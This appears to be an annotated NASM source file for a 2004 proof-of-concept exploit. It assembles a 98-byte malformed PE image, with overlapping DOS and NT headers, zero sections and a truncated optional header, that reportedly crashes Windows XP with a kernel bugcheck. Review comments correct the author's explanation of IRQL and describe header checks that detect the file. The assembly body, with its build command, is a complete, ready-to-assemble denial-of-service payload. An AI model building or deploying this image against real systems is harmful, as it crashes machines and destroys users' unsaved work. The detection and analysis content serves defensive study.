; -----------------------------------------------------------------------------
; Legion2000 Security Research -- assembled by iqlord, 2004-09-16
;
; David VS Goliath ::: dvg.asm
; Proof-of-concept: local denial of service (kernel bugcheck) on Windows XP.
;
; WHAT THIS FILE IS
;   It is not a program that runs; it is a 98-byte *data image*. The original
;   listing spelled every byte as a 16-bit mnemonic whose opcode happens to be
;   the wanted value (dec bp = 4Dh 'M', pop dx = 5Ah 'Z', push ax = 50h 'P',
;   inc bp = 45h 'E', ...). Below the same bytes are written as plain data with
;   the PE field each one lands in, so the artefact can be audited field by
;   field. The assembled output is byte-for-byte identical.
;
;   The image is a deliberately malformed PE:
;     * e_lfanew (DOS header, offset 3Ch) == 4, so the NT headers start inside
;       the DOS header and the two views overlap ("MZ\0\0PE\0\0" at offset 0).
;     * NumberOfSections == 0, SizeOfHeaders == 0, SizeOfImage == 0FF00DCh,
;       SizeOfOptionalHeader == 0E0h although the file ends at offset 62h, so
;       every field past Subsystem and all data directories are missing.
;   Despite the .com output name the bytes are an MZ/PE image.
;
; EFFECT (as reported by the author; reproduce only inside a throw-away VM)
;   Launching the file makes the XP kernel bugcheck with STOP 0x0000000A
;   IRQL_NOT_LESS_OR_EQUAL. That stop code means kernel-mode code dereferenced
;   an invalid (or pageable) address while running at an IRQL that is too high
;   to take the fault. NOTE(review): the original header explained this as
;   "a kernel-mode process can only access processes with lower IRQL"; that is
;   not what IRQL is (it is a per-processor interrupt-masking level, not a
;   property of a process). The bad dereference is presumably in the image
;   loader's handling of the overlapping / truncated headers above; this
;   listing does not identify the faulting routine. "All versions of WinXP"
;   is the author's claim and is unverified here. There is no code execution
;   and no privilege gain -- the payload is pure bugcheck / denial of service.
;
; DEFENSIVE NOTE
;   The image fails the most basic PE sanity checks (NT headers overlapping the
;   DOS header, zero sections, zero SizeOfHeaders, optional header running past
;   EOF). A header validator or AV engine can flag it on those alone.
;
; BUILD (tested by the author on NASM 0.98.3)
;   nasmw -o dvg.com -f bin -- dvg.asm
;   Expected output size: 98 (62h) bytes. No label-relative values are
;   emitted, so no `org` directive is needed for -f bin.
;
; Greets from the original release: ntfx, lordhib, rattle, paris2k, zwoop, tz,
; sigXcpu.
; -----------------------------------------------------------------------------

; ---- IMAGE_DOS_HEADER (only the two fields the loader looks at) -------------
        db      'M', 'Z'                ; 00h  e_magic = IMAGE_DOS_SIGNATURE
        dw      0                       ; 02h  (unused DOS fields up to e_lfanew)

; ---- IMAGE_NT_HEADERS, reached through e_lfanew = 4 (see offset 3Ch) --------
        db      'P', 'E', 0, 0          ; 04h  Signature = IMAGE_NT_SIGNATURE

; ---- IMAGE_FILE_HEADER ------------------------------------------------------
        dw      0x014C                  ; 08h  Machine = IMAGE_FILE_MACHINE_I386
        dw      0                       ; 0Ah  NumberOfSections = 0 (no sections at all)
        dd      0                       ; 0Ch  TimeDateStamp
        dd      0                       ; 10h  PointerToSymbolTable
        dd      0                       ; 14h  NumberOfSymbols
        dw      0x00E0                  ; 18h  SizeOfOptionalHeader = 224, but only 54 bytes follow before EOF
        dw      0x000F                  ; 1Ah  Characteristics: RELOCS_STRIPPED | EXECUTABLE_IMAGE
                                        ;      | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED

; ---- IMAGE_OPTIONAL_HEADER32 (truncated) ------------------------------------
        dw      0x010B                  ; 1Ch  Magic = IMAGE_NT_OPTIONAL_HDR32_MAGIC (PE32)
        db      0, 0                    ; 1Eh  MajorLinkerVersion, MinorLinkerVersion
        dd      0                       ; 20h  SizeOfCode
        dd      0                       ; 24h  SizeOfInitializedData
        dd      0                       ; 28h  SizeOfUninitializedData
        dd      0x00FF0050              ; 2Ch  AddressOfEntryPoint (RVA far outside the 98-byte file)
        dd      0x00FF00F0              ; 30h  BaseOfCode
        dd      0x000000F0              ; 34h  BaseOfData
        dd      0x00400000              ; 38h  ImageBase
        dd      0x00000004              ; 3Ch  SectionAlignment = 4 -- doubles as e_lfanew = 4 in the DOS view
        dd      0x00000004              ; 40h  FileAlignment = 4
        dw      0, 0                    ; 44h  MajorOperatingSystemVersion, MinorOperatingSystemVersion
        dw      0, 0                    ; 48h  MajorImageVersion, MinorImageVersion
        dw      4, 0                    ; 4Ch  MajorSubsystemVersion = 4, MinorSubsystemVersion = 0
        dd      0                       ; 50h  Win32VersionValue
        dd      0x00FF00DC              ; 54h  SizeOfImage
        dd      0                       ; 58h  SizeOfHeaders = 0
        dd      0                       ; 5Ch  CheckSum
        dw      2                       ; 60h  Subsystem = IMAGE_SUBSYSTEM_WINDOWS_GUI
; EOF at 62h: DllCharacteristics, stack/heap sizes, LoaderFlags,
; NumberOfRvaAndSizes and every data directory are absent.